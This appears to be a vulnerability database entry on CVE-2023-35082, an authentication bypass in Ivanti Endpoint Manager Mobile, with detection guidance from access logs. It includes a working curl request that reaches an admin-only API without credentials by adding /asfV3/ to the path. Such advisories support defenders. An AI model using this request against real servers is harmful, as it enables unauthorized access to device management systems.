High
CVE-2023-35082
CVE-2023-35082
Description
An authentication bypass vulnerability in Ivanti EPMM 11.10 and older, allows unauthorized users to access restricted functionality or resources of the application without proper authentication. This vulnerability is unique to CVE-2023-35078 announced earlier.
Add Assessment
Technical Analysis
Update: August 8, 2023: Ivanti have indicated that CVE-2023-35082 affects all versions of Endpoint Manager Mobile (EPMM) prior to a patch released August 7, 2023. The attacker rating value for CVE-2023-35082 has been increased to reflect the new product versions affected by this vulnerability.
CVE-2023-35082 gives an attacker unauthenticated API access to a vulnerable Ivanti Endpoint Manager Mobile (EPMM) or MobileIron Core target.
An attacker can access the MobileIron Core API unauthenticated, by including /asfV3/ in the URL path, for example:
c:\> curl -k https://192.168.86.103/mifs/asfV3/api/v2/ping
This will successfully call the ping API endpoint, which is meant to require authentication from a user with admin role privileges, and the following result is returned:
{"results":{"apiVersion":2.0,"vspVersion":"VSP 11.2.0.0 Build 31 "}}
The /var/log/httpd/https-access_log log file on the appliance will show indicators of compromise for entries containing /mifs/asfV3/api/v2/in the path and a HTTP response code of 200. For example:
192.168.86.34:61736 - - 2023-07-28--15-24-51 "GET /mifs/asfV3/api/v2/ping HTTP/1.1" 200 68 "-" "curl/8.0.1" 3285
CVSS V3 Severity and Metrics
General Information
Vendors
- ivanti
Products
- endpoint manager mobile
References
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
